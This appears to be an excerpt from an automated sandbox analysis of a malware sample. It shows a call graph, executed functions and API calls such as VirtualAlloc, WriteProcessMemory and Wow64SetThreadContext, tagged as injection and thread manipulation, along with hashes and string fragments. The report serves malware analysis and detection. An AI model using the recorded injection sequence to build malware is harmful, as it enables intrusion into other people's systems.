29086 7aa96f 12 API calls 29084->29086 29085->29084 29087 7aa965 29086->29087 29089 7aa982 VirtualAlloc 29087->29089 29784 7aa9df 10 API calls 29087->29784 29091 7ab53a 29089->29091 29094 7ab55f 29089->29094 29092 7ab54b 8 API calls 29091->29092 29093 7ab540 29092->29093 29095 7ab568 7 API calls 29093->29095 29096 7ab909 29094->29096 29101 7ac1d6 29094->29101 29095->29094 29785 7ab9b3 6 API calls 29096->29785 29102 7ac896 VirtualFree 29101->29102 29103 7ac8ba 29102->29103 29103->27783 29110 7ab68b 29104->29110 29105 7ab909 29786 7ab9b3 6 API calls 29105->29786 29110->29105 29111 7ac1d6 29110->29111 29112 7ac896 VirtualFree 29111->29112 29113 7ac8ba 29112->29113 29113->27783 29115 7ac584 VirtualFree 29114->29115 29117 7ac8ba 29115->29117 29117->27783 29119 7ac4a4 VirtualFree 29118->29119 29121 7ac8ba 29119->29121 29121->27783 29123 7ac0bd 29122->29123 29124 7ac108 29123->29124 29127 7ac1d6 29123->29127 29125 7ac117 2 API calls 29124->29125 29126 7ac10e 29125->29126 29128 7ac896 VirtualFree 29127->29128 29129 7ac8ba 29128->29129 29129->27783 29131 7f178d Wow64SetThreadContext 29130->29131 29133 7f2318 29131->29133 29135 7c8ca0 VirtualProtect 29134->29135 29137 7c8cff 29135->29137 29139 80f68e 29138->29139 29140 80f6a6 VirtualProtect 29139->29140 29141 80f69c 29139->29141 29140->29141 29141->27783 29142 80fdd3 VirtualProtect 29141->29142 29143 80fdf4 29142->29143 29143->27783 29145 7ab79b 29144->29145 29146 7ab909 29145->29146 29147 7ac1d6 29145->29147 29787 7ab9b3 6 API calls 29146->29787 29152 7ac896 VirtualFree 29147->29152 29153 7ac8ba 29152->29153 29153->27783 29155 7aa99b VirtualAlloc 29154->29155 29157 7ab53a 29155->29157 29160 7ab55f 29155->29160 29158 7ab54b 8 API calls 29157->29158 29159 7ab540 29158->29159 29161 7ab568 7 API calls 29159->29161 29162 7ab909 29160->29162 29165 7ac1d6 29160->29165 29161->29160 29788 7ab9b3 6 API calls 29162->29788 29168 7ac896 VirtualFree 29165->29168 29169 7ac8ba 29168->29169 29169->27783 29171 7ef9d3 WriteProcessMemory 29170->29171 29184 7efabe 29171->29184 29188 7efab9 29171->29188 29174 7efed9 29175 7efefe 29174->29175 29176 7f080b 29174->29176 29792 7effad 8 API calls 29175->29792 29793 7f0823 8 API calls 29176->29793 29181 7effa6 29190 7efbf4 29184->29190 29194 7efd93 29184->29194 29789 7efcca 8 API calls 29184->29789 29190->29174 29791 7efed3 8 API calls 29190->29791 29194->29190 29790 7efc6b 8 API calls 29194->29790 29198 7ab69c 29197->29198 29199 7ab909 29198->29199 29204 7ac1d6 29198->29204 29794 7ab9b3 6 API calls 29199->29794 29205 7ac896 VirtualFree 29204->29205 29206 7ac8ba 29205->29206 29206->27783 29208 7a7770 LoadLibraryW 29207->29208 29210 7a7799 LoadLibraryW 29208->29210 29211 7a77b6 29208->29211 29210->29211 29214 7a8488 29211->29214 29216 7a7bbb 29211->29216 29212 7a913d 29796 7a91f1 22 API calls 29212->29796 29214->29212 29225 7a9a0a 29214->29225 29795 7a8055 22 API calls 29216->29795 29221 7a804b 29226 7aa5c7 22 API calls 29225->29226 29227 7aadd5 29225->29227 29228 7aa5bd 29226->29228 29227->27783 29236 7f13a0 29229->29236 29230 7f1467 29231 7f1746 6 API calls 29230->29231 29249 7f173c 29231->29249 29232 7f1beb 29797 7f1c53 Wow64SetThreadContext Wow64SetThreadContext 29232->29797 29235 7f1b75 4 API calls 29237 7f1b6b 29235->29237 29236->29230 29238 7f16b2 7 API calls 29236->29238 29237->29232 29239 7f1baa 29237->29239 29238->29236 29242 7f1bc4 Wow64SetThreadContext 29239->29242 29245 7f176d Wow64SetThreadContext 29242->29245 29244 7f19c3 5 API calls 29244->29249 29250 7f2318 29245->29250 29246 7f180e 29246->29232 29246->29235 29249->29244 29249->29245 29249->29246 29252 7c8a6d VirtualProtect 29251->29252 29254 7c8cff 29252->29254 29256 7aaea5 29255->29256 29257 7ab4c6 VirtualAlloc 29256->29257 29258 7ab53a 29257->29258 29261 7ab55f 29257->29261 29259 7ab54b 8 API calls 29258->29259 29260 7ab540 29259->29260 29262 7ab568 7 API calls 29260->29262 29263 7ab909 29261->29263 29268 7ac1d6 29261->29268 29262->29261 29798 7ab9b3 6 API calls 29263->29798 29269 7ac896 VirtualFree 29268->29269 29270 7ac8ba 29269->29270 29270->27783 29272 7fa3c1 29271->29272 29273 7fa3ec VirtualProtect 29272->29273 29274 7fa42c 29273->29274 29276 7aaea5 29275->29276 29277 7ab4c6 VirtualAlloc 29276->29277 29278 7ab53a 29277->29278 29281 7ab55f 29277->29281 29279 7ab54b 8 API calls 29278->29279 29280 7ab540 29279->29280 29282 7ab568 7 API calls 29280->29282 29283 7ab909 29281->29283 29288 7ac1d6 29281->29288 29282->29281 29799 7ab9b3 6 API calls 29283->29799 29289 7ac896 VirtualFree 29288->29289 29290 7ac8ba 29289->29290 29290->27783 29292 7ab4a9 VirtualAlloc 29291->29292 29294 7ab53a 29292->29294 29297 7ab55f 29292->29297 29295 7ab54b 8 API calls 29294->29295 29296 7ab540 29295->29296 29298 7ab568 7 API calls 29296->29298 29299 7ab909 29297->29299 29304 7ac1d6 29297->29304 29298->29297 29800 7ab9b3 6 API calls 29299->29800 29305 7ac896 VirtualFree 29304->29305 29306 7ac8ba 29305->29306 29306->27783 29308 7c81d8 29307->29308 29309 7c84e7 29308->29309 29312 7c85b5 29308->29312 29310 7c8553 2 API calls 29309->29310 29311 7c854b 29310->29311 29313 7c8cbd VirtualProtect 29312->29313 29314 7c8cff 29313->29314 29317 7b26af 29315->29317 29316 7b274b VirtualProtect 29320 7b294d VirtualProtect 29316->29320 29321 7b2907 29316->29321 29317->29316 29319 7b2756 5 API calls 29317->29319 29319->29316 29325 7b29f8 29320->29325 29801 7b2923 VirtualProtect 29321->29801 29327 7ac4a4 VirtualFree 29326->29327 29329 7ac8ba 29327->29329 29329->27783 29331 7ab120 VirtualAlloc 29330->29331 29333 7ab53a 29331->29333 29336 7ab55f 29331->29336 29334 7ab54b 8 API calls 29333->29334 29335 7ab540 29334->29335 29337 7ab568 7 API calls 29335->29337 29338 7ab909 29336->29338 29343 7ac1d6 29336->29343 29337->29336 29802 7ab9b3 6 API calls 29338->29802 29344 7ac896 VirtualFree 29343->29344 29345 7ac8ba 29344->29345 29345->27783 29347 7abcc6 6 API calls 29346->29347 29352 7abb09 29346->29352 29347->29352 29348 7abd83 29349 7ac896 VirtualFree 29348->29349 29351 7ac8ba 29349->29351 29350 7abde3 5 API calls 29353 7abddb 29350->29353 29351->27783 29352->29348 29352->29350 29357 7abe24 29353->29357 29358 7ac02a 4 API calls 29353->29358 29354 7ac108 29355 7ac117 2 API calls 29354->29355 29356 7ac10e 29355->29356 29357->29348 29357->29354 29358->29357 29360 7aa947 29359->29360 29361 7aa96f 12 API calls 29360->29361 29362 7aa965 29361->29362 29364 7aa982 VirtualAlloc 29362->29364 29803 7aa9df 10 API calls 29362->29803 29366 7ab53a 29364->29366 29369 7ab55f 29364->29369 29367 7ab54b 8 API calls 29366->29367 29368 7ab540 29367->29368 29370 7ab568 7 API calls 29368->29370 29371 7ab909 29369->29371 29376 7ac1d6 29369->29376 29370->29369 29804 7ab9b3 6 API calls 29371->29804 29377 7ac896 VirtualFree 29376->29377 29378 7ac8ba 29377->29378 29378->27783 29380 7c8cd3 VirtualProtect 29379->29380 29381 7c8cff 29380->29381 29383 7a57ce 29382->29383 29384 7a5d9d VirtualProtect 29383->29384 29385 7a5dfc 29384->29385 29387 7b270d 29386->29387 29388 7b274b VirtualProtect 29387->29388 29389 7b2756 5 API calls 29387->29389 29391 7b294d VirtualProtect 29388->29391 29392 7b2907 29388->29392 29389->29388 29396 7b29f8 29391->29396 29805 7b2923 VirtualProtect 29392->29805 29398 7ab4c6 VirtualAlloc 29397->29398 29399 7ab53a 29398->29399 29402 7ab55f 29398->29402 29400 7ab54b 8 API calls 29399->29400 29401 7ab540 29400->29401 29403 7ab568 7 API calls 29401->29403 29404 7ab909 29402->29404 29409 7ac1d6 29402->29409 29403->29402 29806 7ab9b3 6 API calls 29404->29806 29410 7ac896 VirtualFree 29409->29410 29411 7ac8ba 29410->29411 29411->27783 29413 7a5603 29412->29413 29414 7a5610 29413->29414 29419 7a56de 29413->29419 29807 7a5625 VirtualProtect 29414->29807 29420 7a5d9d VirtualProtect 29419->29420 29421 7a5dfc 29420->29421 29423 7c82d7 29422->29423 29423->29422 29424 7c84e7 29423->29424 29427 7c85b5 29423->29427 29425 7c8553 2 API calls 29424->29425 29426 7c854b 29425->29426 29428 7c8cbd VirtualProtect 29427->29428 29429 7c8cff 29428->29429 29432 7bd044 29430->29432 29431 7bd08a 29432->29431 29433 7bd1bf VirtualProtect 29432->29433 29434 7bd1ed 29433->29434 29438 7ac038 29435->29438 29436 7ac08c 3 API calls 29436->29438 29437 7ac05e 29439 7ac108 29437->29439 29442 7ac1d6 29437->29442 29438->29436 29438->29437 29440 7ac117 2 API calls 29439->29440 29441 7ac10e 29440->29441 29443 7ac896 VirtualFree 29442->29443 29444 7ac8ba 29443->29444 29444->27783 29446 7f1732 29445->29446 29447 7f1746 6 API calls 29446->29447 29463 7f173c 29447->29463 29448 7f176d Wow64SetThreadContext 29464 7f2318 29448->29464 29449 7f1beb 29808 7f1c53 Wow64SetThreadContext Wow64SetThreadContext 29449->29808 29452 7f1b75 4 API calls 29453 7f1b6b 29452->29453 29453->29449 29454 7f1baa 29453->29454 29458 7f1bc4 Wow64SetThreadContext 29454->29458 29457 7f180e 29457->29449 29457->29452 29458->29448 29460 7f19c3 5 API calls 29460->29463 29463->29448 29463->29457 29463->29460 29466 7c8cbd VirtualProtect 29465->29466 29467 7c8cff 29466->29467 29469 7c8cbd VirtualProtect 29468->29469 29470 7c8cff 29469->29470 29472 7bd1bf VirtualProtect 29471->29472 29473 7bd1ed 29472->29473 29475 7c80e2 VirtualProtect 29474->29475 29477 7c8cff 29475->29477 29479 7c8c94 VirtualProtect 29478->29479 29481 7c8cff 29479->29481 29483 7ab6bc 29482->29483 29484 7ab909 29483->29484 29489 7ac1d6 29483->29489 29809 7ab9b3 6 API calls 29484->29809 29490 7ac896 VirtualFree 29489->29490 29491 7ac8ba 29490->29491 29491->27783 29493 7c88e6 29492->29493 29494 7c88f6 VirtualProtect 29492->29494 29493->29494 29496 7c86c1 29493->29496 29499 7c8cff 29494->29499 29497 7c8880 VirtualProtect 29496->29497 29498 7c8876 29497->29498 29507 7b2533 29500->29507 29502 7b294d VirtualProtect 29509 7b29f8 29502->29509 29503 7b2907 29810 7b2923 VirtualProtect 29503->29810 29508 7b2756 5 API calls 29507->29508 29510 7b25c5 VirtualProtect 29507->29510 29508->29510 29510->29502 29510->29503 29512 7aa687 29511->29512 29513 7aa691 29512->29513 29514 7aa6c0 20 API calls 29512->29514 29515 7aa96f 12 API calls 29513->29515 29514->29513 29516 7aa965 29515->29516 29518 7aa982 VirtualAlloc 29516->29518 29811 7aa9df 10 API calls 29516->29811 29520 7ab53a 29518->29520 29523 7ab55f 29518->29523 29521 7ab54b 8 API calls 29520->29521 29522 7ab540 29521->29522 29524 7ab568 7 API calls 29522->29524 29525 7ab909 29523->29525 29530 7ac1d6 29523->29530 29524->29523 29812 7ab9b3 6 API calls 29525->29812 29531 7ac896 VirtualFree 29530->29531 29532 7ac8ba 29531->29532 29532->27783 29534 7ac521 VirtualFree 29533->29534 29536 7ac8ba 29534->29536 29536->27783 29538 7abd48 29537->29538 29540 7abde3 5 API calls 29538->29540 29548 7abd83 29538->29548 29539 7ac896 VirtualFree 29541 7ac8ba 29539->29541 29545 7abddb 29540->29545 29541->27783 29542 7ac108 29543 7ac117 2 API calls 29542->29543 29544 7ac10e 29543->29544 29546 7ac02a 4 API calls 29545->29546 29547 7abe24 29545->29547 29546->29547 29547->29542 29547->29548 29548->29539 29550 7f1959 29549->29550 29550->29549 29551 7f19c3 4 API calls 29550->29551 29552 7f1a13 29550->29552 29551->29550 29553 7f1beb 29552->29553 29555 7f1b75 4 API calls 29552->29555 29813 7f1c53 Wow64SetThreadContext Wow64SetThreadContext 29553->29813 29556 7f1b6b 29555->29556 29556->29553 29557 7f1baa 29556->29557 29559 7f1bc4 Wow64SetThreadContext 29557->29559 29561 7f1bbd Wow64SetThreadContext 29559->29561 29566 7f2318 29561->29566 29568 7f22eb Wow64SetThreadContext 29567->29568 29569 7f2318 29568->29569 29571 7a5603 29570->29571 29572 7a5610 29571->29572 29577 7a56de 29571->29577 29814 7a5625 VirtualProtect 29572->29814 29578 7a5d9d VirtualProtect 29577->29578 29579 7a5dfc 29578->29579 29581 7a51bb VirtualProtect 29580->29581 29583 7a5dfc 29581->29583 29585 7abdd4 29584->29585 29586 7abde3 5 API calls 29585->29586 29590 7abddb 29586->29590 29587 7ac108 29588 7ac117 2 API calls 29587->29588 29589 7ac10e 29588->29589 29591 7ac02a 4 API calls 29590->29591 29592 7abe24 29590->29592 29591->29592 29592->29587 29593 7ac1d6 29592->29593 29594 7ac896 VirtualFree 29593->29594 29595 7ac8ba 29594->29595 29595->27783 29597 7a51d3 VirtualProtect 29596->29597 29599 7a5dfc 29597->29599 29601 7a57e9 29600->29601 29602 7a5d9d VirtualProtect 29601->29602 29603 7a5dfc 29602->29603 29605 7a7770 LoadLibraryW 29604->29605 29607 7a7799 LoadLibraryW 29605->29607 29608 7a77b6 29605->29608 29607->29608 29612 7a7bbb 29608->29612 29618 7a8488 29608->29618 29609 7a913d 29816 7a91f1 22 API calls 29609->29816 29815 7a8055 22 API calls 29612->29815 29617 7a804b 29618->29609 29622 7a9a0a 29618->29622 29623 7aadd5 29622->29623 29624 7aa5c7 22 API calls 29622->29624 29623->27783 29625 7aa5bd 29624->29625 29627 7c85d3 29626->29627 29628 7c8cbd VirtualProtect 29627->29628 29629 7c8cff 29628->29629 29631 7aa9d8 VirtualAlloc 29630->29631 29817 7aa9df 10 API calls 29630->29817 29634 7ab53a 29631->29634 29637 7ab55f 29631->29637 29635 7ab54b 8 API calls 29634->29635 29636 7ab540 29635->29636 29638 7ab568 7 API calls 29636->29638 29639 7ab909 29637->29639 29644 7ac1d6 29637->29644 29638->29637 29818 7ab9b3 6 API calls 29639->29818 29645 7ac896 VirtualFree 29644->29645 29646 7ac8ba 29645->29646 29646->27783 29648 7aa6d8 18 API calls 29647->29648 29654 7aa6ce 29648->29654 29649 7aa6ed 29650 7aa96f 12 API calls 29649->29650 29651 7aa965 29650->29651 29658 7aa982 VirtualAlloc 29651->29658 29820 7aa9df 10 API calls 29651->29820 29652 7aa8df 29819 7aa8f1 16 API calls 29652->29819 29653 7aa89f 29656 7aa8af 14 API calls 29653->29656 29654->29649 29654->29652 29654->29653 29656->29649 29660 7ab53a 29658->29660 29664 7ab55f 29658->29664 29661 7ab54b 8 API calls 29660->29661 29662 7ab540 29661->29662 29663 7ab568 7 API calls 29662->29663 29663->29664 29665 7ab909 29664->29665 29670 7ac1d6 29664->29670 29821 7ab9b3 6 API calls 29665->29821 29671 7ac896 VirtualFree 29670->29671 29672 7ac8ba 29671->29672 29672->27783 29674 7b2907 29673->29674 29676 7b294d VirtualProtect 29673->29676 29822 7b2923 VirtualProtect 29674->29822 29679 7b29f8 29676->29679 29681 7ac3db 29680->29681 29682 7ac896 VirtualFree 29681->29682 29683 7ac8ba 29682->29683 29683->27783 29685 7fa3e7 29684->29685 29686 7fa3ec VirtualProtect 29685->29686 29687 7fa42c 29686->29687 29689 7b2306 29688->29689 29691 7b231a 11 API calls 29689->29691 29697 7b23f1 29689->29697 29690 7b25c5 VirtualProtect 29695 7b2907 29690->29695 29700 7b294d VirtualProtect 29690->29700 29692 7b2310 29691->29692 29694 7b23f8 11 API calls 29692->29694 29694->29697 29823 7b2923 VirtualProtect 29695->29823 29697->29690 29702 7b2756 5 API calls 29697->29702 29701 7b29f8 29700->29701 29702->29690 29704 7c82b3 29703->29704 29705 7c84e7 29704->29705 29708 7c85b5 29704->29708 29706 7c8553 2 API calls 29705->29706 29707 7c854b 29706->29707 29709 7c8cbd VirtualProtect 29708->29709 29710 7c8cff 29709->29710 29713 7b2413 11 API calls 29712->29713 29714 7b2408 29713->29714 29717->28002 29720->28087 29726->28140 29730->28226 29737->28382 29741->28434 29752->28569 29757->28678 29762->28743 29767->28832 29770->28875 29777->28936 29784->29089 29792->29181 29795->29221 29803->29364 29811->29518 29815->29617 29817->29631 29820->29658 29824 437ac1 29825 437b12 29824->29825 29827 437b06 ExitProcess 29824->29827 29829 437b2b 29825->29829 29833 437b3a 29829->29833 29831 437b33 ExitProcess 29834 437b6b ExitProcess 29833->29834 29836 42e946 29842 42e983 NtQueryDefaultLocale 29836->29842 29843 42e994 29836->29843 29838 42ee30 29854 42eec7 25 API calls 29838->29854 29842->29838 29844 42eca8 29842->29844 29843->29842 29845 42ebbd 29843->29845 29844->29838 29846 42ebee 29845->29846 29848 42ebe2 NtQueryDefaultLocale 29845->29848 29855 42ec16 29846->29855 29850 42ee30 29848->29850 29853 42eca8 29848->29853 29862 42eec7 25 API calls 29850->29862 29853->29850 29856 42ec47 NtQueryDefaultLocale 29855->29856 29858 42ee30 29856->29858 29861 42eca8 29856->29861 29863 42eec7 25 API calls 29858->29863 29861->29858 29864 42014b 29865 420157 29864->29865 29866 42017f VirtualProtect 29865->29866 29867 4201c2 29866->29867 29868 43016f 29869 430182 29868->29869 29871 4301a4 NtQueryDefaultLocale 29869->29871 29881 4301d6 29869->29881 29873 43026a 29871->29873 29874 43045d 29871->29874 29892 43027d 13 API calls 29873->29892 29893 430474 13 API calls 29874->29893 29882 430209 NtQueryDefaultLocale 29881->29882 29884 43026a 29882->29884 29885 43045d 29882->29885 29894 43027d 13 API calls 29884->29894 29895 430474 13 API calls 29885->29895

                                    Executed Functions

                                    Function 007A6C25 Relevance: 84.5, APIs: 2, Strings: 46, Instructions: 503libraryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • LoadLibraryW.KERNELBASE(?), ref: 007A778F
                                    • LoadLibraryW.KERNELBASE(FFFFF55C), ref: 007A77AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: A$E$F$L$L$P$V$V$W$a$a$a$a$b$c$c$d$e$e$e$i$i$i$i$l$l$l$l$o$o$o$r$r$r$r$r$r$s$s$t$t$t$u$u$x$y
                                    • API String ID: 1029625771-2526299333
                                    • Opcode ID: 8c3d988e9a67ed8fee7b140b24425a86b54a01020a060741ae632ad1be85c51e
                                    • Instruction ID: 4154316272c1b74ef57b097dcd6a65b036a90ecaf40d39e32166d91283532bb9
                                    • Opcode Fuzzy Hash: 8c3d988e9a67ed8fee7b140b24425a86b54a01020a060741ae632ad1be85c51e
                                    • Instruction Fuzzy Hash: D422B561D096A88AF7218B24CC447AABB75EF92304F0481F9D44CA7282D67E5FD5CF62
                                    Function 007EF736 Relevance: 61.7, APIs: 1, Strings: 34, Instructions: 414injectionCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 120 7ef736-7ef772 122 7ef774-7ef780 120->122 123 7ef785-7ef79a 120->123 124 7efa76-7efab7 WriteProcessMemory 122->124 125 7ef79c-7ef7a8 123->125 126 7ef7ad-7ef7cc 123->126 130 7efabe-7efbf2 124->130 131 7efab9-7f384a call 7f3833 124->131 125->124 128 7ef7ce-7ef7da 126->128 129 7ef7df-7ef7f1 126->129 128->124 132 7ef804-7ef86d 129->132 133 7ef7f3-7ef7ff 129->133 142 7efbf4-7efbfe 130->142 143 7efc03-7efc4e 130->143 170 7f384c-7f3856 131->170 171 7f385b-7f38a6 call 7f3889 131->171 137 7efa6a-7efa70 132->137 138 7ef873-7ef8bd 132->138 133->124 137->124 141 7ef8ce-7ef8df 138->141 145 7ef8e5-7ef8f5 141->145 146 7ef980-7ef9d1 call 7ef990 141->146 147 7efebf-7efed7 call 7efed3 142->147 153 7efc5f-7efcc3 143->153 154 7efc50-7efc5a 143->154 145->146 152 7ef8fb-7ef94c 145->152 163 7ef9df-7efa36 146->163 164 7ef9d3-7ef9dd 146->164 166 7efed9-7efef8 147->166 158 7ef94e-7ef970 152->158 159 7ef972 152->159 169 7efcca-7efd91 call 7efcde 153->169 154->147 158->159 167 7ef979 158->167 159->141 180 7efa38-7efa42 163->180 181 7efa44 163->181 172 7efa4e-7efa55 164->172 174 7efefe-7effa6 call 7effad 166->174 175 7f080b-7f082a call 7f0823 166->175 167->146 213 7efdab-7efdbb 169->213 214 7efd93-7efda9 169->214 177 7f3b17-7f3b44 call 7f3b45 170->177 193 7f38a8-7f38b2 171->193 194 7f38b7-7f38bd 171->194 182 7efa57-7efa63 172->182 183 7efa65 172->183 197 7f0831-7f089e 175->197 198 7f082c call 7f0839 175->198 180->172 181->172 182->124 183->124 193->177 199 7f38c3-7f391b 194->199 204 7f08af-7f08fa call 7f08d2 197->204 205 7f08a0-7f08aa 197->205 198->197 210 7f3922-7f39e9 199->210 221 7f08fc-7f0906 204->221 222 7f090b-7f09a2 call 7f09a4 204->222 208 7f0b6b-7f0b92 call 7f0b80 call 7f0b93 205->208 229 7f39eb-7f3a01 210->229 230 7f3a03-7f3a13 210->230 213->169 220 7efdc1-7efdd4 213->220 219 7efe0e-7efe15 214->219 223 7efe57-7efe6a call 7efe6b 219->223 224 7efe17-7efe55 219->224 220->169 227 7efdda-7efdea 220->227 221->208 222->208 223->147 224->147 234 7efdec-7efdf6 227->234 235 7efdf8 227->235 237 7f3a66-7f3a6d 229->237 230->210 238 7f3a19-7f3a2c 230->238 241 7efe02-7efe08 234->241 235->241 244 7f3aaf-7f3afb 237->244 245 7f3a6f-7f3a7b call 7f3a7d 237->245 238->210 242 7f3a32-7f3a42 238->242 241->219 246 7f3a44-7f3a4e 242->246 247 7f3a50 242->247 250 7f3b0d 244->250 251 7f3afd-7f3b07 244->251 245->244 252 7f3a5a-7f3a60 246->252 247->252 250->177 251->199 251->250 252->237
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,?,00000004,?), ref: 007EFAAF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID: A$D$E$OP=6$P$P$S$b$c$c$c$e$e$e$e$g$i$i$o$o$o$p$r$r$s$s$s$s$t$t$t$u$v$x
                                    • API String ID: 3559483778-1785805788
                                    • Opcode ID: 91f3712596a6694e812837967e646db4ef824f0782312ae84fa6a800b9c0e4ca
                                    • Instruction ID: 81495f418581a44c8f6e699d42e92f4481a892a8c409ba750356cd24b16dbf66
                                    • Opcode Fuzzy Hash: 91f3712596a6694e812837967e646db4ef824f0782312ae84fa6a800b9c0e4ca
                                    • Instruction Fuzzy Hash: 2D12BEB1E052A88AEB24CB15CC84BEABBB5AF99304F1441EAC40D67781D67D5FC1CF51
                                    Function 007F1394 Relevance: 44.1, APIs: 1, Strings: 24, Instructions: 337threadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 257 7f1394-7f1465 259 7f1467-7f1471 257->259 260 7f1476-7f14c1 257->260 261 7f1732-7f176b call 7f1746 259->261 262 7f14c3-7f14cd 260->262 263 7f14d2-7f14d8 260->263 270 7f17ae-7f180c 261->270 271 7f176d-7f17a9 261->271 262->261 264 7f14de-7f1536 263->264 266 7f153d-7f1604 264->266 268 7f161e-7f162e 266->268 269 7f1606-7f161c 266->269 268->266 273 7f1634-7f1647 268->273 272 7f1681-7f1688 269->272 274 7f181f-7f1834 270->274 275 7f180e-7f181a 270->275 291 7f22eb-7f2311 Wow64SetThreadContext 271->291 282 7f16ca-7f1716 272->282 283 7f168a-7f16bd call 7f169b call 7f16b2 272->283 273->266 277 7f164d-7f165d 273->277 279 7f1847-7f1866 274->279 280 7f1836-7f1842 274->280 278 7f1b10-7f1b17 275->278 285 7f165f-7f1669 277->285 286 7f166b 277->286 289 7f1b1d-7f1ba8 call 7f1b75 278->289 290 7f1beb-7f1c7e call 7f1c53 278->290 287 7f1879-7f188b 279->287 288 7f1868-7f1874 279->288 280->278 300 7f1728 282->300 301 7f1718-7f1722 282->301 283->282 295 7f1675-7f167b 285->295 286->295 296 7f189e-7f1907 287->296 297 7f188d-7f1899 287->297 288->278 289->290 316 7f1baa-7f1be6 call 7f1bc4 289->316 317 7f1c8f-7f1cda 290->317 318 7f1c80-7f1c8a 290->318 303 7f2318-7f384a call 7f3833 291->303 295->272 309 7f190d-7f1957 296->309 310 7f1b04-7f1b0a 296->310 297->278 300->261 301->264 301->300 349 7f384c-7f3856 303->349 350 7f385b-7f38a6 call 7f3889 303->350 312 7f1968-7f1979 309->312 310->278 319 7f197f-7f198f 312->319 320 7f1a1a-7f1a6b 312->320 316->291 323 7f1cdc-7f1ce6 317->323 324 7f1ceb-7f1d08 call 7f1d09 317->324 327 7f1f4b-7f1f5d call 7f1f5f 318->327 319->320 328 7f1995-7f19e6 call 7f19c3 319->328 325 7f1a6d-7f1a77 320->325 326 7f1a79-7f1ad0 320->326 323->327 324->327 332 7f1ae8-7f1aef 325->332 334 7f1ade 326->334 335 7f1ad2-7f1adc 326->335 351 7f1a0c 328->351 352 7f19e8-7f1a0a 328->352 341 7f1aff 332->341 342 7f1af1-7f1afd 332->342 334->332 335->332 341->310 342->278 353 7f3b17-7f3b44 call 7f3b45 349->353 360 7f38a8-7f38b2 350->360 361 7f38b7-7f38bd 350->361 351->312 352->351 355 7f1a13 352->355 355->320 360->353 362 7f38c3-7f391b 361->362 365 7f3922-7f39e9 362->365 369 7f39eb-7f3a01 365->369 370 7f3a03-7f3a13 365->370 371 7f3a66-7f3a6d 369->371 370->365 372 7f3a19-7f3a2c 370->372 374 7f3aaf-7f3afb 371->374 375 7f3a6f-7f3a7b call 7f3a7d 371->375 372->365 373 7f3a32-7f3a42 372->373 376 7f3a44-7f3a4e 373->376 377 7f3a50 373->377 379 7f3b0d 374->379 380 7f3afd-7f3b07 374->380 375->374 381 7f3a5a-7f3a60 376->381 377->381 379->353 380->362 380->379 381->371
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 007F22F9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID: E$L$L$OP=6$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                    • API String ID: 983334009-205251571
                                    • Opcode ID: 12a1dc460291a7c7a91e330d57197651433e2a2924f89a8654363eb5aa09630b
                                    • Instruction ID: 60be3d6e55498047663ee6abf055955690aa4d7bcf6ea8b3dd3aefd844d71c60
                                    • Opcode Fuzzy Hash: 12a1dc460291a7c7a91e330d57197651433e2a2924f89a8654363eb5aa09630b
                                    • Instruction Fuzzy Hash: 1ED1D2B2D091A8DAEB208A24DC48BEABB75AF81314F4540F9D44C67281D7BD5FC5CF62
                                    Function 007AA5C7 Relevance: 39.3, APIs: 1, Strings: 25, Instructions: 285COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 383 7aa5c7-7aa68f 385 7aa6a0-7aa6bf call 7aa6c0 383->385 386 7aa691-7aa69b 383->386 387 7aa947-7aa980 call 7aa96f 385->387 386->387 392 7aa982-7aa9be 387->392 393 7aa9c3-7aa9da call 7aa9df 387->393 396 7ab495-7ab538 VirtualAlloc 392->396 393->396 402 7ab53a-7ab578 call 7ab54b call 7ab568 396->402 403 7ab580-7ab903 396->403 402->403 412 7ab909-7aba84 call 7ab9b3 call 7aba85 403->412 413 7ac1d6-7ac8b8 call 7ac253 VirtualFree 403->413 435 7ac8ba-7ac8dc 413->435 436 7ac902-7ac940 413->436 435->436 439 7ac8de-7ac900 435->439 440 7ac948-7ac952 436->440 439->436 439->440
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$L$L$W$W$a$a$a$a$b$b$d$d$i$i$j@h$o$o$r$r$r$r$y$y
                                    • API String ID: 4275171209-2974322545
                                    • Opcode ID: 8f7c6e194ea65a41a98fa7e283d16fe88b08ca6f8023506353705b52753e5d3b
                                    • Instruction ID: 11652b54b1991800e11077fc1b12c6898bbd762ceb892a06ed659dd343f07e17
                                    • Opcode Fuzzy Hash: 8f7c6e194ea65a41a98fa7e283d16fe88b08ca6f8023506353705b52753e5d3b
                                    • Instruction Fuzzy Hash: 52C1A4A1D082A88FF721CA24DC047AABB79EF96310F0481FAD44D67681D6BD5FC58F52
                                    Function 00435E80 Relevance: 32.1, APIs: 1, Strings: 17, Instructions: 629memoryCOMMON
                                    Download Yara Rule
